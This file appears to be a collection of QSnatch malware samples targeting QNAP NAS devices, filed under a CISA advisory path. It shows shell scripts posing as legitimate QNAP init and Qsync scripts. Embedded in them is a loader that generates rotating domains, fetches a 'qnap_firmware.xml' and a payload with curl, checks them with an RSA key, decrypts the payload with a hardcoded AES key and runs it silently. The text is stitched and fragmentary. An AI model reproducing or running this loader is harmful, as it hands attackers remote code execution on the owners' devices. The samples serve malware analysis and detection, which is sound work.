+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
+cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	{ /share/MD0_DATA/NOPE; exit 0; }
+fi
+fi

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8

@@ -0,0 +1,511 @@
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJog4rwwSz1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        echo "$outfile https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)" > /tmp/hellomalware.txt
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
